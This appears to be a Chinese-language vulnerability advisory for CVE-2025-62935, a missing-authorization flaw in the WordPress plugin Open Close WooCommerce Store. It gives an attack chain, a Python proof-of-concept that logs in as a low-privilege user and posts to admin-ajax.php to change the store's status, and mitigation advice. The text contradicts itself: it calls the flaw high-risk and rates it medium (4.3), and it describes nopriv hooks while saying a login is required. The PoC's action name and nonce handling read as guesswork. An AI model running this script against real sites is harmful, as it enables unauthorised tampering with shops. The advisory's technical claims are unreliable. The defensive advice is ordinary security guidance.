CVE-2025-62935 WordPress Open Close WooCommerce Store 访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-62935

漏洞类型

访问控制

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open Close WooCommerce Store (WordPress Plugin woc-open-close)

漏洞概述

CVE-2025-62935是WordPress插件Open Close WooCommerce Store（woc-open-close）中的一个高危访问控制漏洞。该漏洞由PatchStack安全团队发现，漏洞类型为Missing Authorization（缺失授权验证），允许具有低权限的认证用户执行超出其权限范围的敏感操作。Open Close WooCommerce Store是一款用于管理WooCommerce商店营业时间的WordPress插件，帮助店主设置和控制商店的开关门时间。该插件在处理用户请求时未能正确验证当前用户是否具有执行特定操作的权限，导致任何已认证用户（包括订阅者角色的低权限用户）都可以调用本应仅限管理员使用的功能。攻击者可以利用此漏洞修改商店营业时间设置、绕过业务逻辑限制或获取敏感配置信息。此漏洞的CVSS评分为4.3，属于中等严重程度，攻击向量为网络形式，无需用户交互，但需要攻击者拥有有效的网站账户。鉴于WordPress生态系统的广泛使用和该插件在商业网站中的应用，此漏洞可能影响大量使用该插件的在线商店。

技术细节

该漏洞的根本原因在于Open Close WooCommerce Store插件在关键功能点缺少适当的权限检查。插件在处理AJAX请求或直接函数调用时，未验证调用者是否具有管理员权限。具体而言，插件的某些管理功能（如营业时间设置、开关门状态修改等）直接通过wp_ajax或wp_ajax_nopriv钩子暴露，但仅检查用户是否登录，而未验证用户角色或能力（capability）。攻击者只需拥有一个注册账户（即使是最低权限的订阅者角色），即可向服务器发送特制请求，触发这些本应受保护的管理功能。攻击利用方式相对简单：攻击者使用已登录用户的身份凭证（如WordPress会话cookie或REST API认证令牌），向插件的AJAX端点发送请求，通过修改请求参数（如post_id、action等）来调用管理员级别的功能。由于WordPress的AJAX处理机制会自动处理用户认证，攻击者无需绕过身份验证系统，只需利用已持有的低权限账户即可实现攻击。漏洞影响版本从n/a至5.0.0版本，攻击者可通过自动化工具批量扫描和利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者注册目标WordPress网站账户，获取低权限用户账号（如订阅者角色）

STEP 2

步骤2

使用该低权限账户登录WordPress，获取有效的会话cookie或认证令牌

STEP 3

步骤3

识别插件的AJAX端点（通常为/wp-admin/admin-ajax.php），分析插件暴露的action参数

STEP 4

步骤4

构造恶意请求，指定目标action为管理员级别的功能（如修改营业时间、切换商店状态等）

STEP 5

步骤5

发送特制请求，由于插件未验证用户权限，服务器错误地执行了本应拒绝的操作

STEP 6

步骤6

攻击者成功修改商店配置、绕过业务逻辑限制或获取未授权的敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62935 PoC - Open Close WooCommerce Store Broken Access Control
#!/usr/bin/env python3

import requests
import sys

# Configuration
target_url = "http://target-wordpress-site.com"
username = "attacker_account"
password = "attacker_password"

# Login to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}

print("[*] Logging in to WordPress...")
response = session.post(login_url, data=login_data, cookies=session.cookies)

if "wordpress_logged_in" not in str(session.cookies):
    print("[-] Login failed!")
    sys.exit(1)

print("[+] Login successful!")

# Exploit the missing authorization vulnerability
# Target the plugin's AJAX handler
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Change store status (exploit the broken access control)
exploit_data = {
    "action": "woc_open_close_save_status",  # Plugin-specific action
    "store_status": "closed",  # Modify store status
    "nonce": "",  # May not be properly validated
}

print("[*] Exploiting missing authorization vulnerability...")
response = session.post(ajax_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Exploit sent successfully!")
    print(f"[*] Response: {response.text[:200]}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

影响范围

Open Close WooCommerce Store (woc-open-close) <= 5.0.0

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制WordPress网站的注册功能，避免未知用户注册；2) 审查并删除所有可疑的低权限账户；3) 使用WordPress安全插件（如Wordfence）监控异常的AJAX请求；4) 临时禁用Open Close WooCommerce Store插件，待官方发布修复版本后再启用；5) 实施Web应用防火墙（WAF）规则，拦截针对admin-ajax.php的异常请求模式；6) 定期审计管理员和编辑角色的用户列表，确保没有未授权账户。